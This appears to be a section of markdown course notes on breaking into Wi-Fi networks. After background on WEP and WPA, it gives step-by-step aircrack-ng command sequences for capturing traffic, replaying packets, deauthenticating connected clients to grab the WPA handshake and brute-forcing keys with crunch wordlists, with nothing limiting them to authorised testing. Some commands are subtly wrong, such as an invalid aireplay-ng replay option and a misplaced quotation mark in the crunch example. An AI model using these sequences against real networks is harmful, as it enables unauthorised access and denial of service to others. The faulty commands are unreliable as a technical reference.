# Section-6 How to hack into a Wi-Fi network

> What is Wi-Fi

- Unguided transmission media
- Wireless network

**In simple words** *It is a wireless network techonology allowing devices to be connected to the internet.*
<br><br>

> How hackers break into Wi-Fi

* **Sniffing** - Allows hackers to hijack any packet of data that is being transmitted between a device and a router.

* **Spoofing** - Allows the hacker to mimic or replicate a trusted source.

* **War driving** - Spotting and exploiting wireless local area networks while driving around in a car.

* **Encryption cracking** - Hackers using bruteforce on the router in order to crack its decryption key.

* **Brute force** - Cyber attack equivalent of trying every key on your key ring, and eventually find the right one.
<br><br>

> Wi-Fi hacking system setup

* External Wifi adapter with a specific chipset:
    - Atheros AR9271 (only supports 2.4 GHz).
    - Ralink RT3070.
    - Ralink RT3572.
    - Ralink RT5370N.
    - Ralink RT5372.
    - Ralink RT5572.
    - RealTek 8187L.
* Virtual box extension pack (for virtual box only)
<br><br>

> Installing the driver for (Alfa AWUS036ACH) adapter
```md
**Phase one** (add the following)

-> vim /etc/apt/sources.list
-> deb http://http.kali.org/kali kali-rolling main non-free contrib
-> deb-src http://http.kali.org/kali kali-rolling main non-free contrib

----------------------------------------------------------------------

**Phase two** (enter the following)

1. sudo apt-get install dkms
2. git clone https://github.com/aircrack-ng/rtl8812au
3. cd rtl8812au
4. sudo ./dkms-install.sh
```
<br>

> Monitor mode
```md
1. ifconfig wlan0 down
2. airmon-ng check kill
3. iwconfig wlan0 mode monitor
4. ifconfig wlan0 up
```

## WEP hacking

- Wired Equivalent Privacy (WEP) is a security algorithm for IEEE 802.11 wireless networks. Introduced as part of the original 802.11 standard ratified in 1997, its intention was to provide data confidentiality comparable to that of a traditional wired network.

- The main flaw with WEP is its use of small Initialization Vectors (IVs) and small encryption key size (64 bit or 128 bit).

- IVs takes up to 24 bits of the encryption key and it remains unchanged in a buzy network so the total number of combinations are very small and easy to guess.

**ATTACK**
```sh
# Goto Monitor Mode:

ifconfig wlan0 down
airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
-----------------------------------------------------------
# Capture packets:

sudo airodump-ng --band b wlan0
sudo airodump-ng --bssid "[MAC_ADDRESS]" --channel "[CH no.]" --write "[anything]" wlan0
-----------------------------------------------------------
# Crack:

sudo aircrack-ng "[anything.cap]"
```
**NOTE** - (*In order to make it work you need to generate a lot of fake traffic...*)
```sh
sudo aireplay-ng --fakeauth 0 -a "[Router MAC address]" -h "[Hacker MAC address]" wlan0
sudo aireplay-ng --aireplay -b "[Router MAC address]" -h "[Hacker MAC address]" wlan0
```

## WPA/WPA2 hacking

- Wi-Fi Protected Access (WPA) is a security standard for users of computing devices equipped with wireless internet connections. WPA was developed by the Wi-Fi Alliance to provide more sophisticated data encryption and better user authentication than Wired Equivalent Privacy (WEP), the original Wi-Fi security standard.

- Deauthenticate the network in order to capture 4 way handshake.

**ATTACK**
```sh
# Goto Monitor Mode:

ifconfig wlan0 down
airmon-ng check kill
iwconfig wlan0 mode monitor
ifconfig wlan0 up
-----------------------------------------------------------
# Capture packets:

sudo airodump-ng --band b wlan0
sudo airodump-ng --bssid "[MAC_ADDRESS]" --channel "[CH no.]" --write "[anything]" --band a/b wlan0
-----------------------------------------------------------
# Deauthentication:

sudo aireplay-ng -0 0 -a "[Router MAC address]" -h "[Connected host MAC address]" -D wlan0
-----------------------------------------------------------
# Crack:

sudo aircrack-ng "[anything.cap]" -w "[wordlist]" 
```
**NOTE** - (You can create your own wordlist by using crunch)
```sh
sudo crunch "[min. no. of char]" "[max. no. of char]" "[combination on letters and numbers] -t [pattern]"

# Example:

sudo crunch 10 15 abcdefghijklmnopqrstuvwxyz -t Ay@@@@@@@@@@ia
```